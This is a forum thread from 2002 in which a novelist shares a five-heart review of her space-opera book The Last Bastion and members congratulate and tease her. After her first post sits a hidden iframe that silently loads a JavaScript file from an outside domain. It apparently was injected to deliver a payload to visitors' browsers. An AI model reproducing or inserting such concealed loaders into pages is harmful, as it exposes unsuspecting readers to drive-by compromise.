+ Reply to Thread

Talking Peeling myself off the ceiling!

Oh. My. God. Heartland Reviews (read by bookstores and librarians to help them choose what new books to buy) just reviewed The Last Bastion and sent me an advance copy. I'm still shaking. In giving it Five out of Five possible 'Hearts' -- the reviewer wrote:

The Last Bastion is an epic sci fi first book of three written on the scale of the Foundation, Dune, or Dorsai series. Imagine a woman genius, the ultimate sexy feminist, who finds herself in love with and impregnated by a cyborg. Impossible you say, and so do the characters in the story, yet such is the case. At the same time, talented starship companions and ex-lovers are doing all they can to protect the couple from the military/industrial
    complex and the status quo governmental system. Meanwhile, an aggressive alien race threatens the borders of civilization. All the elements are in place for classic space opera.

Were it written by someone else, this plot might have easily bogged down; however, MS Wellesley, pulls it off with élan. Mark our words, this author has the potential to become the next Issac Asimov, Gordon Dickson, or Frank Herbert. She is that good! Her counterplay between the female protagonist and the cyborg who keeps astounding everyone with his surprising capabilities which even he didn't know existed, makes for startling plot
    twists and humorous yet touching reader reactions. There are so many strong characters, one wonders who the real protagonist is. The author uses numerous flashbacks and POV changes in highly complex combinations, and yet accomplishes them in an easy to follow storyline and without confusion. We excitedly rated this book with five hearts.

Bob Spear
    Heartland Reviews
    ----------------------------------------

Authors only dream about reviews like this. So somebody pinch me - please.

Lisa<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

Platinum Member
    I take it awriter = Lisa = Ms. Wellesley?

If that's the case, Congratulations!

grrrrrrrrrrrrrrrrrrrrrr........................

Now I know that Vrede gets the girl.............. ah well...

Mark our words, this author has the potential to become the next Issac Asimov, Gordon Dickson, or Frank Herbert.
    CONGRATS LISA!!!!!!!!!!!!!............. enjoying the hell outa it myself (lil that I have time to read lately). Seems like everybody makes that Frank Herbert comparison - the first one that struck me. Geez yall.... we got a celeb in here now.....lol
    .....beam me up Scotty...

Originally posted by adiascar
    I take it awriter = Lisa = Ms. Wellesley?
    You didn't hear that from me.

If that's the case, Congratulations!

Thank you! I'll be sure to pass it on to 'her'. {g}

Lisa

Re: grrrrrrrrrrrrrrrrrrrrrr........................

Originally posted by petewat
    Now I know that Vrede gets the girl............

Now, now Pete -- the reviewer didn't say that, did he? And I wouldn't assume it, either = laughing = since nothing in the book is quite that simple. Guess you'll actually have to finish it to find out. And no looking at the last page either! :p

As for the Frank Herbert/Dune comparison, I can only tell you that I'm flabbergasted -- and as flattered as all get out. The story is big, no question, but to put me in the same company.... woof.

Lisa
    Last edited by awriter; 07-15-2002 at 02:35 PM.

WOW!

A real star amongst our midst. How much are they offering for the mini series/movie rights?

Get an attorney real quick, I mean like yesterday, and have him get Hollywood high prced mouthpiece that knows the ropes and has been around the block a few times and set the parameters now.

You could be set for life if it is as good as they say. Talk about lifestyle change!!!

I wish I had a copy to read. I have a Mac and a palm 515 and was unable to get a copy to load properly.

My best wishes and we will look forward to your "fifteen minutes" of fame. Hmmm, maybe a page or two in "People" magazine.
    Si hoc Legere Scis Nimium Eruditionis habes.

Re: WOW!

Originally posted by shhchem
    A real star amongst our midst. How much are they offering for the mini series/movie rights?

LOL -- I wish. :p

I wish I had a copy to read. I have a Mac and a palm 515 and was unable to get a copy to load properly.
    No problem. You can either reserve an advance, autographed copy of the Trade Paperback now (and be one of the first to get it when it comes out in about three or four months) by clicking HERE, or get a Palm version now by writing to me at: bwellesley@writerscollective.org

And thanks so much for your kind words!

Lisa
    Last edited by awriter; 07-15-2002 at 06:13 PM.

he he...

woof
    LOL :p

Administrator

Arrow

Issac Asimov is my boy! loved his work!! thats pretty impressive to be named in the same sentence as him! kudos lisa....

when you get ready to work out the crew for your production, be sure and holler at me.. i can find you a good Steadicam Operator and assistant!

RE: gets the girl! geesh! you guys shhh!! i have not gotten that far yet....

Aight yall........

I gotta weigh in on this book. IT ROCKS!!!!!!....how's that for a sophisticated literary review? seriously.... if ya like science fiction & ya look for the ones that tweek ya intellectually as well as viscerally (as in Marianne has become my dream gurl - wet & dry ...lol) you need to read this book. I don't mean to demean it by bein flip, it is a serious contender to win Lis recognition as one of the best new sci fi writers to come along in a long time. Shhhhhhh....NO....Lisa isn't payin me...LOL. PS- gonna write a serious review soon, :p

Re: Aight yall........

Originally posted by petewat
    I gotta weigh in on this book. IT ROCKS!!!!!!....how's that for a sophisticated literary review? seriously.... if ya like science fiction & ya look for the ones that tweek ya intellectually as well as viscerally (as in Marianne has become my dream gurl - wet & dry ...lol) you need to read this book. NO....Lisa isn't payin me...LOL. PS- gonna write a serious review soon, :p
    Hey, Pete -- if I was paying you it wouldn't be enough. :p You actually made me blush. As to Mariamne being your dream girl, well... all I can say is that there are days I downright hate that woman. What a life! {to say nothing of the MEN in it!} I get exceedingly jealous of her sometimes.

And I would love to read a serious review, not just because you seemed to, uh, like it -- but because up till now it's been reviewed by Reviewers; you know, with a capital 'R'. Be nice to hear from the man-on-the-street, so to speak.

Again, thanks so much for the kind words. I'll look for you at the book signing; I'm sure you'll be the guy with his tongue hanging out when "That Woman" walks into the room.

Lisa
    Last edited by awriter; 08-01-2002 at 11:42 PM.

if I was paying you it wouldn't be enough
    :p
    women.............. always wantin more, LOL. Savin the full review for after I finish it Lis - yup, I'm slow - am enjoying it, just not much time to read it. It's great hav'n it on my I300 though... get stuck in a borin meeting or Dr.'s office & they think I'm workin, lol.